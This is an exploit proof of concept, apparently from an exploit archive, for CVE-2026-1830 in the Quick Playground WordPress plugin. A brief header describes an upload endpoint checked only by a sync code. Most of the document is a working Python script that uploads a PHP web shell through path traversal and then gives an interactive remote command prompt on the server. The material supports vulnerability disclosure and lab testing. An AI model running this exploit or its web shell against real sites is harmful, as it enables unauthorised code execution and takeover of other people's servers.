# Exploit Title: Quick Playground for WordPress 1.3.1 - Unauthenticated Remote Code Execution 
# Google Dork: N/A
# Date: 2026-05-22
# Exploit Author: cardosource
# Vendor Homepage: https://quickplayground.com
# Software Link: https://downloads.wordpress.org/plugin/quick-playground.1.3.1.zip
# Version: <= 1.3.1
# Tested on: Docker / Debian / Apache / PHP 8.2 / WordPress 6.x
# CVE: CVE-2026-1830
#
# Description:
#
# The Quick Playground plugin exposes a REST API endpoint:
#
#   /wp-json/quickplayground/v1/upload_image/{profile}
#
# The endpoint validates uploads exclusively through a sync_code value
# without requiring authenticated WordPress sessions or capability checks.
#
# Vulnerable code:
#
#   if($code == $sync_code)
#       return true;
#
# If a valid sync_code is known, weak, reused, leaked, or predictable,
# an attacker can upload arbitrary files using path traversal sequences.
#
# This PoC demonstrates arbitrary PHP file upload resulting in remote
# command execution in a controlled local lab environment.
#
# LAB SETUP:
#
# docker exec -it <container> \
#   wp option update qckply_sync_code_default 'exploit123' --allow-root
#
# Usage:
#
# python3 poc.py
#
import requests
import base64
import random
import string
import re

TARGET = "http://localhost:8080"
SYNC_CODE = "exploit123"
PROFILE = "default"

s = requests.Session()
s.headers.update({
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/json"
})

name = ''.join(random.choices(string.ascii_lowercase, k=8)) + ".php"

shell = b'<?php if(isset($_GET["cmd"])){echo "<pre>";system($_GET["cmd"]);echo "</pre>";} ?>'

payload = {
    "sync_code": SYNC_CODE,
    "filename": f"../../../{name}",
    "base64": base64.b64encode(shell).decode()
}

url = f"{TARGET}/wp-json/quickplayground/v1/upload_image/{PROFILE}"

print("[-] Sending webshell...")
r = s.post(url, json=payload, timeout=15)

try:
    msg = r.json().get("message", "")
except:
    print("[-] Invalid server response")
    exit()

if "saving to" not in msg:
    print("[-] Upload failed")
    print(r.text[:300])
    exit()

print("[-] Checking execution...")

shell_url = f"{TARGET}/{name}"

r = s.get(shell_url, params={"cmd": "id"}, timeout=10)

m = re.search(r"<pre>(.*?)</pre>", r.text, re.DOTALL)

if not m:
    print("[-] Shell not responding")
    exit()

print("[+] RCE CONFIRMED!")
print(f"[+] Shell: {shell_url}?cmd=command")
print(f"[+] User: {m.group(1).strip()}\n")

while True:
    cmd = input("$ ").strip()

    if cmd == "exit":
        break

    if not cmd:
        continue

    r = s.get(shell_url, params={"cmd": cmd}, timeout=30)

    m = re.search(r"<pre>(.*?)</pre>", r.text, re.DOTALL)

    if m:
        print(m.group(1).strip())